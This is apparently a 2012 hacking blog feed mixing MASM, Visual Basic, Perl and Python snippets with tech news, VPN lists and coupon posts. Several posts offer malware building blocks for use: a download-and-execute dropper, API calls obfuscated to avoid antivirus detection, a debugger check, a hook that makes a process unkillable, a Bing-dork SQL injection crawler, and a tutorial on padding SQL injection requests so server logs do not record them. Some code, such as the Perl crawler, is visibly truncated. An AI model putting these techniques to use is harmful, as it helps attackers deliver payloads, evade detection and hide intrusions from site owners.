Friday, April 27, 2012


;Author SubhashDasyam
;Website http://www.subhashdasyam.com
;email  luk@inbox.com
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\shlwapi.inc
includelib \masm32\lib\shlwapi.lib
include \masm32\include\masm32rt.inc
include \masm32\include\shell32.inc
includelib \masm32\lib\shell32.lib

.data    
    prot     db  ".htm",0
    opn      db  "open",0
   
.data?
    sBufsize    dd  ?
    szExe       dd  ?
   
.code

start:

invoke AssocQueryStringA,0,2,ADDR prot,0,0,ADDR sBufsize ;allocate 0 bytes first it return error how many bytes needed
invoke crt_malloc,sBufsize ;now call malloc and allocate the memory of the bytes returned
mov szExe,eax ;Now allocate the szExe size returned by malloc
invoke AssocQueryStringA,0,2,addr prot,ADDR opn,ADDR szExe,ADDR sBufsize ;pass correct Buffer Size
invoke MessageBoxA,0,ADDR szExe,ADDR szExe,MB_OK ;Get the path :) in szExe
end start
12:37 AM
0 response
Read More

Wednesday, April 25, 2012

;Author SubhashDasyam
;Websites http://www.subhashdasyam.com
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\ntdll.inc
includelib \masm32\lib\ntdll.lib
.data    
    ResFlag     db  0,0 
   
.code

start:
invoke RtlAdjustPrivilege,19,1,0,addr ResFlag ;adjust privileges accoding to the table down
invoke NtShutdownSystem,2  ;call NtShutDownSystem directly from ntdll.dll
end start
For better understand here is the table :) Happy Learning and Coding


8:54 PM
0 response
Read More

Wednesday, April 11, 2012

This Module is for Visual Basic and serve's as an example for hooking the Win32 API's in Visual Basic 

Option Explicit   
 
Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long 
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long 
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByVal Destination As Long, ByVal Source As Long, ByVal Length As Long)  
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long 
Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long 
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long 
Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long 
Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long 
Private Declare Function EnumProcessModules Lib "psapi" (ByVal hProcess As Long, ByRef lphModule As Long, ByVal cb As Long, ByVal lpcbNeeded As Long) As Long 
Private Declare Function GetModuleFileNameEx Lib "psapi" Alias "GetModuleFileNameExA" (ByVal hProcess As Long, ByVal hModule As Long, ByVal lpFileName As String, ByVal nSize As Long) As Long 
 
Private Const MEM_RELEASE = &H8000  
Private Const MEM_COMMIT = &H1000  
Private Const MEM_RESERVE = &H2000  
Private Const PAGE_EXECUTE_READWRITE = &H40  
Private Const PROCESS_ALL_ACCESS = &H1F0FFF  
 
Private hProcess As Long 
Private FuncAddr As Long 
Private OldCode(4) As Byte 
Private NewCode(4) As Byte 
Private HookCode(4) As Byte 
Private CodeAddr As Long 
 
Private Function GetModuleHandleEx(ByVal hProcess As Long, ByVal ModuleName As String) As Long 
Dim hMods(1024) As Long 
Dim cbNeeded As Long 
Dim szModName As String 
Dim i As Integer 
 
If EnumProcessModules(hProcess, hMods(0), 1025 * 4, VarPtr(cbNeeded)) Then 
    For i = 0 To (cbNeeded / 4)  
        If hMods(i) Then 
            szModName = String(260, 0)  
            If GetModuleFileNameEx(hProcess, hMods(i), szModName, Len(szModName)) Then 
                szModName = Left(szModName, InStr(1, szModName, Chr(0)) - 1)  
                If LCase(szModName) = LCase(ModuleName) Then '  
                    GetModuleHandleEx = hMods(i)  
                    Erase hMods  
                    Exit Function 
                End If 
            End If 
        End If 
    Next i  
End If 
Erase hMods  
End Function 
 
Public Function HookNtTerminateProcess(ByVal ProcessId As Long) As Boolean 
Dim hMod As Long 
 
NewCode(0) = &HE9 ' jmp  
' xor eax,eax  
' ret 8  
HookCode(0) = &H33  
HookCode(1) = &HC0  
HookCode(2) = &HC2  
HookCode(3) = &H8  
HookCode(4) = &H0  
 
hProcess = OpenProcess(PROCESS_ALL_ACCESS, False, ProcessId)  
 
If hProcess Then 
    hMod = GetModuleHandleEx(hProcess, "c:\windows\system32\ntdll.dll")  
    If hMod Then 
        FuncAddr = GetProcAddress(hMod, "NtTerminateProcess")  
        If FuncAddr Then 
            ReadProcessMemory hProcess, ByVal FuncAddr, OldCode(0), 5, 0  
            CodeAddr = VirtualAllocEx(hProcess, ByVal 0, 5, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE)  
            If CodeAddr Then 
                CopyMemory VarPtr(NewCode(1)), VarPtr(CodeAddr - FuncAddr - 5), 4  
                WriteProcessMemory hProcess, ByVal CodeAddr, HookCode(0), 5, 0  
                WriteProcessMemory hProcess, ByVal FuncAddr, NewCode(0), 5, 0  
                HookNtTerminateProcess = True 
            End If 
        End If 
    End If 
End If 
End Function 
 
Public Sub UnhookNtTerminateProcess()  
WriteProcessMemory hProcess, ByVal FuncAddr, OldCode(0), 5, 0  
VirtualFreeEx hProcess, ByVal CodeAddr, 5, MEM_RELEASE  
CloseHandle hProcess  
End Sub
1:49 AM
0 response
Read More

Tuesday, April 10, 2012


Anonymous VPN List




VPNs, a.k.a Virtual Private Networks



VPNs are your overall best choice for Anonymizing yourself on the internet. It's fairly easy to setup, there are wide variety and selection of providers from countries across the world. Basically, VPNs are private networks utilized for plenty of privatizing purposes, but for our purposes, you will connect to the internet through your chosen VPN's server(s), and to the rest of the world your IP address and internet identity will appear as one of the VPN company's servers. The wikipedia page on VPNs (http://en.wikipedia.org/wiki/Virtual_private_network) has more info.

USING VPN's

Use of a FREE VPN Warning:
If you don't have to pay for a product, you are the product being sold.
(i.e. Data Mining)

We won't deny to you: Free VPNs are available online, but we strongly recommend you do not go this route. They could be logging your IP address or browsing information and selling it to advertising companies, and are inherently more likely to bend easily and immedietly under any kind of legal pressure. Before you use a Free VPN you might as well look in the Security Handbook for other options you could take to anonymize yourself.

PAID VPN LIST

Following is a list of some trusted VPN providers. You gain trust by paying money for the account, but be sure to ask around for options on trusted ones. A VPN is a Internet Connection that tunnels through your ISP and masks your real IP address. Keep in mind you can pay for these with pre-paid Credit Cards from your local convenience store, ukash, or use a new service called Bitcoin, or another way to translate your money onto the internet (do a google search for "Bitcoin" for more info).

http://www.swissvpn.net - 6 CHF/month, reliable
http://perfect-privacy.com
https://www.ipredator.se
http://www.anonine.se - The service have been started its for 49 SEK permonth
https://www.vpntunnel.se - €5/month. Can pay with ukash so completely anon.
http://www.relakks.com
http://www.steganos.com
http://www.bananavpn.net > logs IPs
http://www.strongvpn.com > logs IPs
http://www.secureix.com
http://www.secretsline.com
http://www.findnot.com
http://www.trackbuster.com
http://www.vpngates.com
http://www.perfect-privacy.com
http://www.trilightzone.org
http://www.vpnaccounts.com
http://www.securstar.de
http://www.witopia.net
http://www.tiggerswelt.net
http://www.xerobank.com > logs IPs
10:05 PM
0 response
Read More



AT&T Customers you have got Good News. It has been confirmed that as of April 8th the iPhone users can unlock their handsets if they want to.

In other words, AT&T is planning to unlock off-contact iPhones for the users who want to unlock their devices. This enables the customers to use any other GSM network not only the one foe which they bought the phone. The thing is that AT&T doesn’t offer unlock codes for the iPhone yet, so in case you are looking to unlock your AT&T iPhone, the company who will do the unlocking is actually Apple. Of, course in order to do that you must first address to AT&T on its online chat.

Even if this information did not come from an AT&T official statement it has been confirmed by the carrier itself. The information appeared last week, but bow we can provide a few more details about how customers can unlock their iPhones.

The first was is the classic way, customers can unlock the devices in-store. However, those who are too lazy or don’t have the time to go to an AT&T store can make it happen through an online chat with the carrier on its official site. The process can be done very easy and in little time. All the data you will need to provide to AT&T is the IMEI (International Mobile Equipment Identity) number. The number can be obtained by going to Settings>General>About on your iPhone.

Once the procedure is completed, you have to wait for an email which should be sent by Apple in maximum 72 hours. The email which comes directly from the phone’s manufacturer contains the unlock code. After Apple sends you the unlock code you will have to back-up and restore and then tether your phone to iTunes in order to conclude the unlock procedure. The procedure is included in an Apple support document referenced by one of the carrier’s officials.

Nevertheless, it seems that the email including the unlock code is not the only way of Apple dealing with the requests. Some of the users had distinct experiences with the unlock. For instance, one particular user that he has to wait until April 16th if he wants to get his iPhone unlocked, instead of receiving the code in 72 hours. Anyway, if you’re having problems unlocking your device you should visit the iMore forums.

Also, if you have more than one phone that you want to unlock, you must submit the request through AT&T customer care. However, this can’t be done for any number of devices as the maximum unlock codes that can be provided for a single account in one year is 5. When it comes to used devices, the carrier will examine the history of the account that belongs to the original owner in order to be sure that the contact has ended. Which reminds me to tell you one more that the only way to get your device unlocked is that you have concluded the original contract for the iPhone.

So, in case your contract with AT&T is completed you can unlock your device and start using other services such as pay-as-you-go or international roaming. Also, you should to that iPhones can now be used on other carriers like US Cellular and T-Mobile (in this case the iPhone can be used only in 2G).
9:55 PM
0 response
Read More

Monday, April 9, 2012


This Snippet is used for calling the API's Dynamically to avoid some detections from Antivirus
This Snippet is just example you can modify as your wish
Lean and Code

;Author:SubhashDasyam
;Website:http://www.subhashdasyam.com
;email:luk@inbox.com
;Complete Dynamically calling the API without Directly loading the DLL's :) 
;Code starts
.386
.model flat, stdcall
option casemap:none ;case sensitive
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
.data

    Msg   db "Mess",0
    age   db "age",0
    Box   db "BoxA",0
    sTest db "MessageBoxA API Call",0
    sDemo db "Demo",0
    sLib1 db "us",0
    sLib2 db "er",0
    sLib3 db "32",0 
    
    
.data?
  sLib              dd ?
  hLib       dd ?
  Func       dd ?
  Result      db ?

.code

start:
    invoke lstrcat,addr Result,addr Msg ;from kernel32
    invoke lstrcat,addr Result,addr age ;from kernel32
    invoke lstrcat,addr Result,addr Box
    invoke lstrcat,addr sLib,addr sLib1
    invoke lstrcat,addr sLib,addr sLib2
    invoke lstrcat,addr sLib,addr sLib3
    invoke LoadLibrary,addr sLib ;LoadLibrary getting sLib = User32
    mov hLib, eax
    invoke GetProcAddress,hLib,addr Result 
    mov Func, eax
    push 0
    push offset sDemo
    push offset sTest
    push 0
    call Func ;Calling the Function Dynamically The MessageBoxA :) 
    invoke ExitProcess,0
end start

1:24 AM
0 response
Read More
This is my second snippet in MASM
This Snippet is used to say when your application is debugged in Ollydbg or immunity debugger
Although there are ways to bypass this but this is one of the way :)
Something is always better than nothing
So here it is
.386
.model flat,stdcall
option casemap:none

include     \masm32\include\windows.inc
include     \masm32\include\kernel32.inc
include     \masm32\include\user32.inc


includelib  \masm32\lib\kernel32.lib
includelib  \masm32\lib\user32.lib

.data

ollyTitle   db "Ollydbg :D"
ollyMsgboxP  db "Present"
ollyMsgboxN  db "Not Present"

.code   

start:
    xor eax,eax ; clearing the eax and set to 0
    cmp esi,0FFFFFFFFh ;comparing the esi with 0FFFFFFFF hexa decimal = -1
    jnz ollyNotPresent
    jmp ollyPresent

ollyNotPresent:
    invoke  MessageBoxA,0,ADDR ollyMsgboxN,ADDR ollyTitle,MB_OK
    invoke  ExitProcess,0

ollyPresent:
    invoke  MessageBoxA,0,ADDR ollyMsgboxP,ADDR ollyTitle,MB_OK
    invoke  ExitProcess,0

END start
12:58 AM
3 response
Read More

Saturday, April 7, 2012

Russian hackers revealed the Android's Botnet Admin Panel take a look at the below picture


Nothing's Safe in this world BEWARE
11:45 PM
0 response
Read More
More than half a million Macs are infected with the Flashback Trojan, a malware package designed to steal personal information, according to a Russian antivirus company.

The company -- Dr. Web -- originally reported today that 550,000 Macintosh computers were infected by the growing Mac botnet. But later in the day, Dr. Web malware analyst Sorokin Ivan announced on Twitter that the number of Macs infected with Flashback had increased to 600,000, with 274 of those based in Cupertino, Calif.

More than half of the Macs infected are in the United States (57 percent), while another 20 percent are in Canada, Dr. Web said.

The malware was initially found in September 2011 masquerading as a fake Adobe Flash Player plug-in installer, but in the past few months it has evolved to exploiting Java vulnerabilities to target Mac systems. A new variant that surfaced over the weekend appears to be taking advantage of Java vulnerability for which Apple released a patch yesterday.

Source:http://news.cnet.com/8301-1009_3-57409619-83/more-than-600000-macs-infected-with-flashback-botnet/
11:43 PM
0 response
Read More

I have started MASM32 Language. For those who doesn't know what is MASM here is the info http://www.masm32.com/.
Its a Microsoft Assembler programming language.
Here is my first snippet in MASM.

MASM32 Download Execute with Unicode Support (This Snippet works even with arabic or chinese systems)

;Author SubhashDasyam
;Date   07-April-2012
;Language MASM
;This Download and execute is basic coding in MASM32 with Unicode support
;if you copy please leave credits
;Works for both x64 and x86 systems Tested
;Made with Windows 7 64 bit
;Filesize 2560 Bytes
.386
.model flat,stdcall
option casemap:none    

;Include Libraries 

    include         \masm32\include\kernel32.inc
    includelib      \masm32\lib\kernel32.lib

    include         \masm32\include\shell32.inc
    includelib      \masm32\lib\shell32.lib

    include         \masm32\include\urlmon.inc
    includelib      \masm32\lib\urlmon.lib  

    include         \masm32\macros\macros.asm ;used for Unicode string for easier USE and understandable

;Data Section    
 
.data

    WSTR    szFileName,"unicode.exe",0 ;Unicode String the Filename you want to Write as with Null terminated
    WSTR    szURL,"http://localhost/unicode.exe",0 ;The URL you want to Download from
    
.code
start:
    Invoke URLDownloadToFileW,0,ADDR szURL,ADDR szFileName,0,0 ;Unicode URLDownloadToFileW Win32 API Function Downloads the URL and Stores in same place
    Invoke ShellExecuteW, 0,0,ADDR szFileName,0,0,0;This executes the Downloaded File from Same Place
    Invoke ExitProcess,0 ; After Execution Exit the process
    
end start


9:50 AM
0 response
Read More

Thursday, March 29, 2012



2$ Godaddy Coupon in this March ( for one account, one time domain 1 year, new domain )

Pay using Credit Card

Code : FITNESS

Go use it and still working till now
3:36 AM
4 response
Read More
I just stumbled upon a google ad (and clicked it believe it or not )

It was a $2.95 network solution discount page which my friend used to purchase 5 domains all at the low price.

Here's the link, hope it still works.
http://www.networksolutions.com/RV19.jsp
3:32 AM
0 response
Read More

Yes you heard it right if you are looking for free webhosting for hosting your blogs etc here it is one of the website is giving away free webhosting.
So why waiting try to grab as many as you want before they close :)

http://www.1freehosting.com/?from=subhashdasyam.com
3:27 AM
1 response
Read More

Wednesday, March 28, 2012


#!/usr/bin/perl

use strict;
use warnings;
use HTTP::Request;
use LWP::UserAgent;

###############
my $dork;
my $url;
my $i;
my $request;
my $useragent;
my $response;
my $start;
my $end;
my $result;
my $fl;
my $link;
my $req;
my $ua;
my $result2;
my $res;
my $save;
my $pages;
my $page;
my $choice;
##############
my @z;

print q{
     _ ____        _   
    | |  _ \      | |  
  __| | |_) | ___ | |_ 
 / _` |  _ < / _ \| __|
| (_| | |_) | (_) | |_ 
 \__,_|____/ \___/ \__|
                       	
################################
##      / SQLi Crawler /      ##
##      Private Edition       ##
##      ~Coded by dbx~        ##
################################

};

MainMenu:

print "------------------------\n";
print "Enter [1] To Begin SQLi.\n";
print "Enter [2] To Exit.\n";
print "------------------------\n\n";
print "Your Choice: ";

chomp ($choice = );
print "\n";

if ($choice eq 1) {&sql_scan}
if ($choice eq 5) {die;}

sub sql_scan
{

print "[+] Enter Bing! dork: ";
chomp ($dork = );
print "\n";
print "[+] How Many Pages To Leech?: ";
chomp ($pages = );
print "\n";

$page = $pages.'1';

print "[~] Crawling...\n\n";

for ($i = 0; $i <= $page; $i=$i+11)
{

$url = "http://www.bing.com/search?q=$dork&go=&qs=n&sk=&sc=8-13&first=$i";

$request = HTTP::Request->new(GET => $url);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($request);
$result = $response->content;

$start = '
>Vulns.txt");
	foreach (@z)
	{
		print vuln_file "$_ \n";
	}
	close(vuln_file);
	print "File Saved!\n\n";
}
goto MainMenu;
}
Download: Mirror 1
12:45 AM
0 response
Read More

Tuesday, March 27, 2012




This is one of the interesting technique to hide your information from remote website via sql injection.
This Tutorial mainly focus upon the LOG evasion via SQL injection.
Normally when you do the SQL injection carelessly (lot of people i have seen) your logs A.K.A ip address and your injection (which might be private for bypassing things) would be logged in the access_logs in linux server and some log files in windows

So how to bypass that ?
have you ever thought of it ?
Will Greets to xpaulx :)



Ok, let us begin.

Certain web-servers are configured in such a way, that only requests of under 4,097 characters are fully logged. The ones that exceed this amount are automatically truncated using "..." in the middle of the request.

For example, we have the following request.

GET /page.php?id=69+and+false+union+select+1,2,@@version,4,5,6--

The request will be logged exactly as it is because it does not exceed the 4,097 char limit.

But what if we add an actually non existing variable to the request, such as &cacat=AAAA (4,097 times), like this:


GET /page.php?id=69+and+false+union+select+1,2,@@version,4,5,6--&cacat=AAAAAAA (4,097 times)


The variable will be ignored as it is not being used by the script and our SQL Injection will be processed succefully, though in the logs, the full request will try to get logged, thus trying to include our useless variable with 4k A's. Our request will be truncated because it exceeds the amount of 4,097 characters, and it will look something like this:


GET /page.php ... User Agent: Mozilla/4.0

Our SQL Injection will no longer appear in the logfile. We have succesfully evaded our attack being logged.

Note: This will not work on all webservers.
3:16 AM
1 response
Read More


Shell Detect is the FREE tool to detect presence of Shell Code within a file or network stream. You can either provide raw binary file (such as generated from Metasploit) or network stream file as input to this tool.

These days attackers distribute malicious files which contains hidden exploit shell code. On opening such files, exploit shell code get executed silently, leading to complete compromise of your system . This is more dangerous when the exploit is 'Zero Day' as it will not be detected by traditional signature based Anti-virus solutions. In such cases ShellDetect may help you to identify presence of shell code (as long as it is in raw format) and help you to keep your system safe.
New version 1.1 provides support for detecting Unicode Shellcode. Now you can directly feed unicode shellcode without converting it to binary or raw form. For example, %u4141%u4242 can be detected directly from the input file.

We recommend running this tool in Virtual Environment (using VMWare, VirtualBox ) as it may cause security issues on your system if the input file is malicious.

Currently ShellDetect tool is in experimentation stage and works on Windows XP (with SP2, SP3) only.

Download Below:


Download File Here
2:59 AM
0 response
Read More 


#!/usr/bin/env python 
# encoding: utf-8 
# Hash Identifier v1.1 
# By Zion3R 

logo='''Blackr00t''' 
 
algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} 
 
# hash.islower()  minusculas 
# hash.isdigit()  numerico 
# hash.isalpha()  letras 
# hash.isalnum()  alfanumerico 
 
def CRC16(): 
    hs='4607' 
    if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("101020") 
def CRC16CCITT(): 
    hs='3d08' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("101040") 
def FCS16(): 
    hs='0e5b' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("101060") 
 
def CRC32(): 
    hs='b33fd057' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("102040") 
def ADLER32(): 
    hs='0607cb42' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("102020") 
def CRC32B(): 
    hs='b764a0d9' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("102060") 
def XOR32(): 
    hs='0000003f' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("102080") 
 
def GHash323(): 
    hs='80000000' 
    if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("103040") 
def GHash325(): 
    hs='85318985' 
    if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("103020") 
 
def DESUnix(): 
    hs='ZiY8YtDKXJwYQ' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: 
        jerar.append("104020") 
 
def MD5Half(): 
    hs='ae11fd697ec92c7c' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("105060") 
def MD5Middle(): 
    hs='7ec92c7c98de3fac' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("105040") 
def MySQL(): 
    hs='63cea4673fd25f46' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("105020") 
 
def DomainCachedCredentials(): 
    hs='f42005ec1afe77967cbc83dce1b4d714' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106025") 
def Haval128(): 
    hs='d6e3ec49aa0f138a619f27609022df10' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106160") 
def Haval128HMAC(): 
    hs='3ce8b0ffd75bc240fc7d967729cd6637' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106165") 
def MD2(): 
    hs='08bbef4754d98806c373f2cd7d9a43c4' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106060") 
def MD2HMAC(): 
    hs='4b61b72ead2b0eb0fa3b8a56556a6dca' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106120") 
def MD4(): 
    hs='a2acde400e61410e79dacbdfc3413151' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106040") 
def MD4HMAC(): 
    hs='6be20b66f2211fe937294c1c95d1cd4f' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106100") 
def MD5(): 
    hs='ae11fd697ec92c7c98de3fac23aba525' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106020") 
def MD5HMAC(): 
    hs='d57e43d2c7e397bf788f66541d6fdef9' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106080") 
def MD5HMACWordpress(): 
    hs='3f47886719268dfa83468630948228f6' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106140") 
def NTLM(): 
    hs='cc348bace876ea440a28ddaeb9fd3550' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106029") 
def RAdminv2x(): 
    hs='baea31c728cbf0cd548476aa687add4b' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106027") 
def RipeMD128(): 
    hs='4985351cd74aff0abc5a75a0c8a54115' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106180") 
def RipeMD128HMAC(): 
    hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106185") 
def SNEFRU128(): 
    hs='4fb58702b617ac4f7ca87ec77b93da8a' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106200") 
def SNEFRU128HMAC(): 
    hs='59b2b9dcc7a9a7d089cecf1b83520350' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106205") 
def Tiger128(): 
    hs='c086184486ec6388ff81ec9f23528727' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106220") 
def Tiger128HMAC(): 
    hs='c87032009e7c4b2ea27eb6f99723454b' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106225") 
def md5passsalt(): 
    hs='5634cc3b922578434d6e9342ff5913f7' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106240") 
def md5saltmd5pass(): 
    hs='245c5763b95ba42d4b02d44bbcd916f1' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106260") 
def md5saltpass(): 
    hs='22cc5ce1a1ef747cd3fa06106c148dfa' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106280") 
def md5saltpasssalt(): 
    hs='469e9cdcaff745460595a7a386c4db0c' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106300") 
def md5saltpassusername(): 
    hs='9ae20f88189f6e3a62711608ddb6f5fd' 
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 
        jerar.append("106320") 
def md5saltmd5pass(): 
    hs='aca2a052962b2564027ee62933d2382f' 
